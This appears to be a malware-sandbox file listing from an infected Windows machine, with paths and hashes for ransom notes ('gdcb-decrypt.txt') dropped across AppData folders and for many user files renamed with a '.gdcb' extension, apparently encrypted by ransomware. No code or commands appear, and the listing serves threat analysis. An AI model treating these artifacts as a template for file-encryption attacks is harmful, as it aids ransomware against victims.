c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\windows\start menu\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\windows\start menu\programs\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\windows\start menu\programs\accessibility\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\windows\start menu\programs\accessories\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\windows\start menu\programs\administrative tools\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\windows\start menu\programs\maintenance\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\windows\start menu\programs\startup\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\windows\start menu\programs\system tools\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\windows\start menu\programs\windows powershell\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\windows\templates\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\windows\themes\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\windows\themes\cachedfiles\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\word\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\extensions\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\crash reports\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\crash reports\events\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\bookmarkbackups\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\crashes\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\crashes\events\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\archived\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\datareporting\archived\2017-05\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gmp\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gmp\winnt_x86-msvc\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gmp-gmpopenh264\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gmp-gmpopenh264\1.6\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gmp-widevinecdm\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\gmp-widevinecdm\1.4.8.903\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\minidumps\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\saved-telemetry-pings\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\sessionstore-backups\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\permanent\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\permanent\chrome\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\permanent\chrome\idb\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\permanent\chrome\idb\2918063365piupsah.files\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\idb\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\journals\gdcb-decrypt.txt 2.71 KB (2774 bytes) MD5: 053ca5bf559f67e020012e7c77b9f0a4
SHA1: 62396f13c1b0faaaec77a52a959100ac8552e65d
SHA256: 67c5ec74051bc364794af65d14089e0b757a7d0eae1080089190274e148984f5 		False
c:\recovery\windowsre\reagent.xml.gdcb 1.55 KB (1584 bytes) MD5: b54a23c3a7b39a79fac497dc373bbd78
SHA1: a436612cd0a6b71203adee2ec4c54e57100198ca
SHA256: e49227c9eca563bc13f73bbd8c27231be8720a3793531e14547944851886513d 		False
c:\users\ciihmnxmn6ps\appdata\roaming\004-sn-0z5c.wav.gdcb 55.23 KB (56560 bytes) MD5: 0f1459dde60a316ff823e5d139c35369
SHA1: 771bd564cb340ab471a52d5bdd9cabca2cca3be1
SHA256: 9f8bfa505d1427cf2580717fb15df2e836367faa754bff27b2c967989d6f8985 		False
c:\users\ciihmnxmn6ps\appdata\roaming\1wmqlmoja01-ep.gif.gdcb 4.50 KB (4608 bytes) MD5: c985de94f816b08c703d1e8d93f38deb
SHA1: 0ee384ce272d390e882f951f253fd9d2fe0c810f
SHA256: 0f4865b1175da7e03fdb6f4987e1f68cdcef4b67e8f60fb8e30b3deea9963810 		False
c:\users\ciihmnxmn6ps\appdata\roaming\4sctkxf.ots.gdcb 6.27 KB (6416 bytes) MD5: abff62fdf29c0c95ac6844262ab0d021
SHA1: ac7e41be580eab8ddaedc3088ac224da241df886
SHA256: 729c5213b77c8ca608f8029cc8b342ac3c7de3ca614d851e43ed86f987f89545 		False
c:\users\ciihmnxmn6ps\appdata\roaming\6ttfnwvzd3wr1.wav.gdcb 95.70 KB (98000 bytes) MD5: 73cf5cc0544c3516cf1336480a2916a5
SHA1: ac4277e0ac06f1c5bdb8b71ad3d34c3f287dddf5
SHA256: 0c3ba80c00a2f1b7df032bd62d17281a5597a3a5414325feeba810e16618bff6 		False
c:\users\ciihmnxmn6ps\appdata\roaming\8mu6pxfxklxwxfc.m4a.gdcb 29.05 KB (29744 bytes) MD5: ee9242e408267dfad7b630abd510826f
SHA1: 735a08f05a58a7dc91196e380cfa32270ad1384e
SHA256: 3337830f27794128aae98c9549e4423d880f86358ea4684f0fb6f284350871f8 		False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\logtransport2\logs\ulog_acroarm2_reader_c8be971a-de95-4557-abcb-db98e0788e08_00209595-b6ba-4fa7-88b0-97083d4c2159_0.log.gdcb 1.89 KB (1936 bytes) MD5: e9a8880e462c8674dace0cb09394f7c1
SHA1: 0b7883ceaf8b1b241054c889cd4ac4fa6090d54d
SHA256: bdeb8a73af6dbb1f3916252969669a1a5eb79c1536cd215770d6954ca563ed2e 		False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\logtransport2\logs\ulog_acroarm2_reader_c8be971a-de95-4557-abcb-db98e0788e08_56653bcd-022e-4023-b1f6-9926fada0024_0.log.gdcb 1.70 KB (1744 bytes) MD5: 49e7890b98e4442c515ccc9b49868c23
SHA1: 7345966c786336a8958b252471e50f15c02deb49
SHA256: 1214c9d673d0ddf85d399eebcfb9e253b3b9cab58d8b4633c19883d36e808a12 		False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\logtransport2\logtransport2.cfg.gdcb 0.73 KB (752 bytes) MD5: d8cdf288e13aadb2ce14a68a669f630a
SHA1: af0df73951537463b1487d42a99e27d7300262cd
SHA256: 31e88e523d65f182fb89bb2a06530a1e5403047db3e4fff4320a3a30832aaf5b 		False
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\sonar\sonar1.0\sonar_policy.xml.gdcb 18.84 KB (19296 bytes) MD5: 0c27e5c8b0aa653b07acefc50652d175
SHA1: d217de833b350ab50ba97c238cbcc18704859f29
SHA256: e0674cc38b38e8e3d90037c5708061d4af4e9ec1f5a637d1cdaf8d042fe172c6 		False
c:\users\ciihmnxmn6ps\appdata\roaming\cztjlrmt.bmp.gdcb 86.44 KB (88512 bytes) MD5: 18e9c822299394be54340564c9495fb9
SHA1: 8bc8db3d2e1665627517a438f14b10d456189d71
SHA256: 89962cf39be2b75f7426d6587173960e24133af7634ee946681f7809d5ce980b 		False
c:\users\ciihmnxmn6ps\appdata\roaming\exocxblrlmurhv.gif.gdcb 75.52 KB (77328 bytes) MD5: 4fd8b71eb547e80a511dea90be2d937e
SHA1: 513a365e82651b25951bc673a31a92c69cbb149f
SHA256: 41a0166c378b2e435300c9445ad20385da33592f6aae8b4f083de3118104a9ad 		False
c:\users\ciihmnxmn6ps\appdata\roaming\fcmh0q4.bmp.gdcb 41.33 KB (42320 bytes) MD5: 33fdf31ed083a84ce2717ffb862ae2e0
SHA1: 8c8812203e8f54e2bcd491ce29ccdfb8ff0efbb7
SHA256: b43655c0d7d972ee2bf316f757c05f9acd99809c4d730bc6ed99ddb92f77f871 		False
c:\users\ciihmnxmn6ps\appdata\roaming\imbmboer.ppt.gdcb 15.38 KB (15744 bytes) MD5: 0ddfd813a62431944e9b86bc00b0c1e3
SHA1: 56e9635f12557abb4b74e6765c41a97aee797d94
SHA256: 5e2349f3cfc00d0623f1168d723ea63d9e371b6ae4496bd2c88f930b19526e08 		False
c:\users\ciihmnxmn6ps\appdata\roaming\ixwxy.png.gdcb 36.11 KB (36976 bytes) MD5: f84242aad257414c6299394eaef94f9c
SHA1: 87b0ce6ba99aab6f95d4e42a442ec6091a1f3287
SHA256: 848fb7439563b074c3cafd736a079171778af3d77dc4ec1dd37c2e308ad62da8 		False
c:\users\ciihmnxmn6ps\appdata\roaming\jxoh-eft2nw-t9x.wav.gdcb 26.38 KB (27008 bytes) MD5: b5415449808e3c6932f4f94d1761bb37
SHA1: a0158afe4f3177fb8c838b46da76c89a637f17b6
SHA256: 2a12c5c57bddc771133012588410bd27b00e5c5aa4f38e08d77805b17b9be816 		False
c:\users\ciihmnxmn6ps\appdata\roaming\ldeazaydq h9.jpg.gdcb 67.34 KB (68960 bytes) MD5: 1a47edbd8f8d1889567df663c75e238f
SHA1: 80a1751c44bf254cdc45a879f337048120065548
SHA256: db8c32bdd3d523dd3327bc56d93e63a74f7be65c3f926cc96b9d18e33832e6ff 		False
c:\users\ciihmnxmn6ps\appdata\roaming\lsi0fbp1d3.flv.gdcb 55.88 KB (57216 bytes) MD5: 939b6ecc6f0aa446c5299714281818cf
SHA1: 40b02c8e732ea82fd2055347bb2510eb73049ebe
SHA256: 32791fd4f7b088308114afd699eb68b8a2adbbae87390a71d3729fa503202ebb 		False
c:\users\ciihmnxmn6ps\appdata\roaming\lxrxkbm2nnswbbwwbk42.mp4.gdcb 96.56 KB (98880 bytes) MD5: 332b91fdf7f7aeba767b44d868a765b9
SHA1: 1e186a019d9f1206dcc31664ccf280f05673e55c
SHA256: 0b92c0b6c77f30eab7f9ad126587ad43ae31dcd64cf5de5792cdf783991bfa62 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\document building blocks\1033\16\built-in building blocks.dotx.gdcb 3.53 MB (3706592 bytes) MD5: 8e8c7452e491075de50f5e9a84a2905f
SHA1: 6a56eafd259c03d9038640e65c04e06c777a6918
SHA256: 98f04c9c24889b943e54bed16be1c26ac46df40e5618e9b8fe57af8b441dd8ab 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\office\recent\index.dat.gdcb 0.58 KB (592 bytes) MD5: 17dad9f4045de6bceb1598659d4c8c5a
SHA1: f1116dc673d7f32d1d5e727f08c18e3be3a9e6be
SHA256: 5e325548acad4849cc825bb073774b29004488bce2942e5f47d36b0d071d9bb2 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\onenote\16.0\preferences.dat.gdcb 5.58 KB (5712 bytes) MD5: 60933f9f1dd6608884f46526bfcc62f2
SHA1: d60250ead57dd4dd0d711191546713fe55a6e40d
SHA256: 9ecc1aa70a74f8f3fb3a94b4e4529d55b4d9bb5701058c2dbf9e6f9f373afa7e 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\outlook\outlook.srs.gdcb 3.02 KB (3088 bytes) MD5: 4f1121df7817b939d28f8853a82910b9
SHA1: 9c7c9b74a28b541ab43a08797d5a7ce1b19238a5
SHA256: 380a1f0a103ed3ded033a0759cd64e3007792e094f58ee01e6f46cfcf1d16624 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\outlook\outlook.xml.gdcb 2.86 KB (2928 bytes) MD5: 96d99e275adaad30e6e1d1c79a424e8d
SHA1: 223ff832d6bd7ef200da2fc1669a2e2770355f63
SHA256: b08df0b6489862834b419808312bb6b5b06bdca4604344a9a201a629d882550c 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\calendar insights.xltm.gdcb 893.38 KB (914816 bytes) MD5: 9ace8d3f5804bec2bf33322bbd7634f2
SHA1: a5f7bdbae0f3bbfc5f8005b13c6bd38fb22bc3c8
SHA256: 9a745102c9d7ffa9789062f6a95a6c62ac685971c15c072a0afce0c355cb6cca 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\cashflow analysis.xltm.gdcb 371.62 KB (380544 bytes) MD5: f4f0fae8060d4b08ae97df8fbcbc778a
SHA1: 4bbbf4874ac53fd766f33e21a89112c9a312d646
SHA256: fce588c4aa8dad0103095bec57de759262ad9375eec73cdb1d4f59fcc392663c 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\email insights.xltm.gdcb 721.30 KB (738608 bytes) MD5: 8d95a48beceba8f02826bc19d41d757b
SHA1: 25ed003799a398df182d45e21bbce9581e5ffbd1
SHA256: dbe9e6b516890cc3fff90caabf3406974ba8ca0bdef492a7138b354860e4fae7 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\normal.dotm.gdcb 19.12 KB (19584 bytes) MD5: a1f1d47ce549e3030af0fc7ebbf1ddf4
SHA1: d2eef073cfe342424dc5037aaf80a9053d856c48
SHA256: 69560b53a62f017be4dadda81b79f7dba384f6490bb5d89ac254025c73babf0e 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\process map for basic flowchart.xltx.gdcb 107.89 KB (110480 bytes) MD5: 4125923df0d5c4f8c5f8fbe6d953f890
SHA1: 9b1d3550bf89fc2d0a150f65b08e60d23bf7d68f
SHA256: 845e7fae5297ef9160843a26088ade29b34791d1519c009e5c138b9d09550015 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\process map for cross-functional flowchart.xltx.gdcb 141.86 KB (145264 bytes) MD5: 06be6a0f948f33e4925148ac17e57a7a
SHA1: 401063e54ac2fca064d0d62d5508936da4353ce6
SHA256: 467b8d5fb7efee0fee5eb90b0b376d01b47ce3449f0806bd23258b9d4b4040a7 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\stock symbols comparison.xltm.gdcb 1.39 MB (1459616 bytes) MD5: 47157eb06e51d5598d4e50d3ffdce68c
SHA1: 754bae77c4fbde31bbf4f9cd7f01522a923a1b10
SHA256: 000bf1b2ffae653fc0165337f881adb2bf84dce78848b89740d892e5c62e5075 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\welcome to excel.xltx.gdcb 483.67 KB (495280 bytes) MD5: e855d4238bfb403c0e8a9a8ce692374d
SHA1: 6ec7ee5763c5da5388cc640811d7719cb3d74c66
SHA256: 7bb0213fbe8377d4a2ad86fb472f7348c3327bead9afd7b7c7a103d2317f2709 		False
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\windows\themes\cachedfiles\cachedimage_1440_900_pos4.jpg.gdcb 74.16 KB (75936 bytes) MD5: 928f5eddd1ad2f0d337d43e0255ac530
SHA1: 34f5af6657e94adf4abb54bdc7033d7498ba1020
SHA256: c7e3a962018b3fe78fd6992cba2e16db651ffad02d178b1aa453cda36c94100f 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mj7j-r46l5.pptx.gdcb 46.75 KB (47872 bytes) MD5: 1a5c5b11fb72d3f1a229d3502ee42617
SHA1: 55494dbf28e2c893ddbf05315376a48e9042cc8b
SHA256: e98a3429769c1c5e7c25bdfe73bf05b48de0ded074257393d762a5b6d0555b8a 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mldkkprkrb.mkv.gdcb 23.20 KB (23760 bytes) MD5: 5d41e1436cb152465ca01f00ef2e86ba
SHA1: d57943b008b3cdccec058f84199cfd83da2959d5
SHA256: 803550b48b231e0d3a8857c12e93eb9adba2dcdd59dd1388ceaaa52850da90f3 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mmsanu.wav.gdcb 71.81 KB (73536 bytes) MD5: 2a49933dba48b24d252de021e4413c12
SHA1: 63a856991bfd691bff8ee577668c09504ad4f460
SHA256: 67dd7bf30a073152cd6c49d9576c0e61ad49ee2c6cc73e098f9d45814786a201 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\addons.json.gdcb 0.55 KB (560 bytes) MD5: 63368ee730c3a277e09a80617cbd5e38
SHA1: f94ad6ebc41a5518eeb48b683896ca132753a07b
SHA256: 9d9b1f87ce8404f1c281d58a3e4f48c97c5f53e197c9dcf91a07095e86bffefd 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\blocklist-addons.json.gdcb 450.03 KB (460832 bytes) MD5: 95e6ddee73cb0be4cacbdf0c5e64c3bf
SHA1: a610ac512fbd42c8bf0c937353c73126d7cfc86b
SHA256: 0a9c87662454702d945325d4cd48ca883193dc964cbe3774f4e2cb5805d68405 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\blocklist-gfx.json.gdcb 27.83 KB (28496 bytes) MD5: 18c18310a1a4b578b24ab7ee03225b37
SHA1: 67bc366aef9829e1d1a6874733fce749848d2db2
SHA256: 963b33dbe8ac26086924d94d1d02b72b5e84247b365c152de45855aebab3cf86 		False
